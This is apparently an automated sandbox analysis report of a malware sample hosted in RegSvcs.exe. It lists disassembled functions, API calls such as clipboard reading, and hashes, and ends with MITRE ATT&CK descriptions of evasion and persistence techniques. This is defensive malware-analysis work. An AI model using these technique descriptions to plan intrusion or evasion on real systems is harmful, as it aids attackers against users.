Opcode Fuzzy Hash: a4e9146ac7ff0a0b315f896bb90d1da02f891ac9e45f21e010e4198281e7def5
Instruction Fuzzy Hash: 7EC09B65E0E6844FD70342B81C131C42B35FE436087EA15C7C58197257E009180F4319

Function 064C4F40 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b88c3931f8a88b9b270f3dfca7b76d6b384da1df20b51d9be25cb4a4d2bd35f6
Instruction ID: 3972f4a80f068f7ea5224b5e7f6a939ede456e6a0156958f751149cfa18001cb
Opcode Fuzzy Hash: b88c3931f8a88b9b270f3dfca7b76d6b384da1df20b51d9be25cb4a4d2bd35f6
Instruction Fuzzy Hash: 66C012655191801EE382C664E4517056F515785214F0880DA9044CB3C7CA16D403CA04

Function 064C8411 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7c3272609980f450e2245fc79b1c7023be3f4dc96fda5f176ded8c98847ec68
Instruction ID: 83635c063901c0e54b50baeec6cde9a3c793820084326d65cf63181f82614e0e
Opcode Fuzzy Hash: f7c3272609980f450e2245fc79b1c7023be3f4dc96fda5f176ded8c98847ec68
Instruction Fuzzy Hash: 88C09B0400F7D15FD30B06209C55B632F549F03145B1901CFF5C04D0D3958C9F198371

Function 064C8A30 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 064C8420 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 064C5CE0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 064C5960 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 064C4C50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

Analysis Process: RegSvcs.exePID: 7328, Parent PID: 1644COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.1%
Total number of Nodes:	69
Total number of Limit Nodes:	5

Executed Functions

Function 00408740 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 228
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408764
GetCurrentThreadId.KERNEL32 ref: 0040876E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087C0
GetForegroundWindow.USER32 ref: 0040884A
ExitProcess.KERNEL32 ref: 00408A04

Strings

b/7, xrefs: 00408794

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: b/7
API String ID: 4063528623-2085417233
Opcode ID: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
Instruction ID: 0d5a416f21ca3bcde6c043f2d710c8a16f1e6c6a059847071c546a7df00bc279
Opcode Fuzzy Hash: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
Instruction Fuzzy Hash: EF71FB73A043154BC318EF79CD8576AF6D6ABC5320F0A863DE5C4A73D1EA7898048B85

Function 004402D0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00443370,?,00000018,?,?,00000018,?,?,?), ref: 004402FE

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 004406A2 Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 004406A2
GetForegroundWindow.USER32 ref: 004406B1

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
Instruction ID: ab39d18eea59de8c0b680b80bbae726c1476b453b8e9e2f579cb72a53367ea8f
Opcode Fuzzy Hash: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
Instruction Fuzzy Hash: 4AD0C7F95905018FD705D771BD8542A36397A4620D38C903DF50741613FD35502A8B5B

Function 0043AA74 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0043AAAF

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
Instruction ID: 2db82b081659a11ebf0adced019d600d4025aec70a5b2eba15313fbfae0b0d52
Opcode Fuzzy Hash: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
Instruction Fuzzy Hash: B0112636A482A58FD719DB3CCA4476DBFA26F8A300F0980ADC4C997385CB789D60C753

Function 00440260 Relevance: 1.5, APIs: 1, Instructions: 45
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B51C,00000000,00000001), ref: 00440292

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
Instruction ID: 9d73e3fc9da24b4a25dc6ea464106973b4d99c6e73c38ef93f1a8f1a834cd47d
Opcode Fuzzy Hash: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
Instruction Fuzzy Hash: EFF0203A909200EBE2006F2ABC05A173668BF8A325F020876F000D31A5D738E8218A9B

Function 0043E860 Relevance: 1.5, APIs: 1, Instructions: 22
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B51C,00000000,00000001), ref: 0043E87E

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
Instruction ID: edab8ee5216d5c962334db0beb90db3a31f2e897247f77843e17d527c4ab1b3a
Opcode Fuzzy Hash: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
Instruction Fuzzy Hash: F0D0A734188121DFD7005F14FC05B873758DF0A351F020872B404AB1B5C234EC50C69C

Function 0043E840 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,67660564,00408969,67660564), ref: 0043E850

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
Instruction ID: 1c12cdc91dcc22cd6618a30bc84945b256d08a32317763a8f107efb347479c5b
Opcode Fuzzy Hash: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
Instruction Fuzzy Hash: E4C09B31145120ABD5103F15FC05FC67F64DF45391F010465B00467076C760BC91C6DD

Non-executed Functions

Function 00423E44 Relevance: 19.7, APIs: 1, Strings: 10, Instructions: 429COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 00423E6A

Strings

d)E+, xrefs: 004242FB
O-O/, xrefs: 00424303
<QrS, xrefs: 0042430B
H%Z', xrefs: 004242F3
UW, xrefs: 004240AE, 004240B2
Y1\3, xrefs: 004242CB
]_, xrefs: 00424070
P5Y7, xrefs: 004242D3
4Y>[, xrefs: 0042431B
A!K#, xrefs: 004242EB

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 4Y>[$<QrS$A!K#$H%Z'$O-O/$P5Y7$Y1\3$d)E+$UW$]_
API String ID: 237503144-2105826625
Opcode ID: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
Instruction ID: 7b8528e6acc013927f719d16868986943a9a1bba7e440ced0a90d285d0ff4e0a
Opcode Fuzzy Hash: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
Instruction Fuzzy Hash: 24D1EAB0608361DBC310CF55E88126BBBF0EF95354F448A2EF9D99B351E3789906CB96

Function 00436590 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004365D0
GetSystemMetrics.USER32 ref: 004365E0
DeleteObject.GDI32 ref: 00436623
SelectObject.GDI32 ref: 00436673
SelectObject.GDI32 ref: 004366CA
DeleteObject.GDI32 ref: 004366F8

Strings

phC, xrefs: 00436790
, xrefs: 004366A1
AnC, xrefs: 00436743

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID: $AnC$phC
API String ID: 3911056724-4014303587
Opcode ID: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
Instruction ID: 106fc45ad3404cda282eaa32535b81ccc0e8128c77ede95de355203d1d43b79a
Opcode Fuzzy Hash: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
Instruction Fuzzy Hash: 0461A3B04497848FE760EF68D58978FBBE0BB85304F00892EE5D88B251D7B85458DF4B

Function 00430050 Relevance: 14.6, Strings: 11, Instructions: 875COMMON

Download Yara Rule

Strings

B-C, xrefs: 0043094B
%!C, xrefs: 00430961
$&C, xrefs: 0043098D
p+C, xrefs: 00430AD3
u'C, xrefs: 004308F9
:/C, xrefs: 00430C68
d/C, xrefs: 004308CD
-C, xrefs: 004307A5
d/C, xrefs: 004308E3
:/C, xrefs: 00430C52
F1C, xrefs: 00430805

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: -C$$&C$%!C$:/C$:/C$B-C$F1C$d/C$d/C$p+C$u'C
API String ID: 0-709081256
Opcode ID: 407d260e2984e500bc938a2af9084afc88076a4a5a4afd9904190e82843a23c4
Instruction ID: d9a4a0d359dcb2b16ba7e2780f5c8e827f4dfc1ae0afff22db1dab9ef28774d1
Opcode Fuzzy Hash: 407d260e2984e500bc938a2af9084afc88076a4a5a4afd9904190e82843a23c4
Instruction Fuzzy Hash: 6792A6B0615B809FD3A1CF3DC841793BBE8AB1A301F14496EE1EED7342D775A9408B69

Function 004245C0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 217COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00424698

Strings

=jh, xrefs: 00424622
D6v4, xrefs: 00424655
}z, xrefs: 00424646

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: =jh$D6v4$}z
API String ID: 237503144-2424248051
Opcode ID: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
Instruction ID: 072dcfe1279749a49c563166b893412059df4ddb98baf7635cf88deb1ed00509
Opcode Fuzzy Hash: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
Instruction Fuzzy Hash: E071227560C3509FE7208F24EC4175FBBE4EBC2718F10892DF5A49B291DBB4980A8B96

Function 004363E0 Relevance: 9.1, APIs: 6, Instructions: 130clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00436402
GetClipboardData.USER32 ref: 00436423
GlobalLock.KERNEL32 ref: 00436440
GlobalUnlock.KERNEL32 ref: 00436565
CloseClipboard.USER32 ref: 0043656D

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
Instruction ID: b86dd0c9fbfd43ae0b58d105ee5404c8a2eb2c5d505c68a19c0745f829c1e84f
Opcode Fuzzy Hash: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
Instruction Fuzzy Hash: C941D1B1908B529FD700AF7C988925ABFA0AB06320F05873EE8E5973C6D3389555C797

Function 004165EE Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 363COMMON

Download Yara Rule

Strings

AtP, xrefs: 0041663A
GpFv, xrefs: 00416633
LH, xrefs: 004165FD

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: AtP$GpFv$LH
API String ID: 0-40351562
Opcode ID: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
Instruction ID: 6bb0aad597ceb399f229923281458bf5411d9ceb9ec5dfacab6a3e1016280f03
Opcode Fuzzy Hash: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
Instruction Fuzzy Hash: 04C1F275200B018FC725CF29C891663B7F2FF96314B1A896ED8968B7A5E778F841CB44

Function 0040D690 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 329COMMON

Download Yara Rule

APIs

Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365D0
Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365E0
Part of subcall function 00436590: DeleteObject.GDI32 ref: 00436623
Part of subcall function 00436590: SelectObject.GDI32 ref: 00436673
Part of subcall function 00436590: SelectObject.GDI32 ref: 004366CA
Part of subcall function 00436590: DeleteObject.GDI32 ref: 004366F8

CoUninitialize.OLE32 ref: 0040D6A0

Strings

^_/C, xrefs: 0040D756
SD, xrefs: 0040D8B8
;d, xrefs: 0040D8B1
TC03, xrefs: 0040D75D

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem$Uninitialize
String ID: ;d$SD$TC03$^_/C
API String ID: 1556769885-3729532250
Opcode ID: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
Instruction ID: 40ffb7c8dda840b4bdf12d856fc54da81b6c6fcd26267cd1a4ca77b1afe074d2
Opcode Fuzzy Hash: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
Instruction Fuzzy Hash: 0DA1F6B56047918FD719CF39C4A0262BFE1FFA7314B28819DC0D64BB86D739A406CB99

Function 0042A810 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042A8EB
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042A97D

Strings

~, xrefs: 0042A832

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: ~
API String ID: 237503144-2894255414
Opcode ID: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
Instruction ID: 0060a675a86d7ee076ee5ed7f34d7278311ae35c8cfae6d949a6dc28de4d3802
Opcode Fuzzy Hash: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
Instruction Fuzzy Hash: A351FEB56483459FE350DF61AC81A2FBBB9EB86704F00583CF6809B291DBB0D40ACB47

Function 0042912D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,FF5DFD53,0000001E,00000000,00000000,0=), ref: 004291F6

Strings

0=, xrefs: 004291EA
P&, xrefs: 0042914B
ER, xrefs: 00429152
0=, xrefs: 00429160

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 0=$0=$ER$P&
API String ID: 237503144-76498936
Opcode ID: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
Instruction ID: a2bc4232f0b587c6731111968c4b9dfd6b547f1d994af41bba96082cdda02b35
Opcode Fuzzy Hash: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
Instruction Fuzzy Hash: 5E31A074A08B518FD7718F28D84036BBBF2FB85710F149E2DC4A69BB91D775A8428F84

Function 0040C9A6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040C9AA
CoInitializeEx.OLE32(00000000,00000002), ref: 0040CADC

Strings

i., xrefs: 0040CAE2

Memory Dump Source

Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd

Similarity

API ID: Initialize
String ID: i.
API String ID: 2538663250-1725878519
Opcode ID: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
Instruction ID: ba51fcffb96049ba4a9d2ecb0e51bddf3b28327b6748284e76850d605b8acc93
Opcode Fuzzy Hash: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
Instruction Fuzzy Hash: 0F41C9B4810B40AFD370EF39D94B7127EB8AB05250F504B1DF9E6866D4E631A4198BD7

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

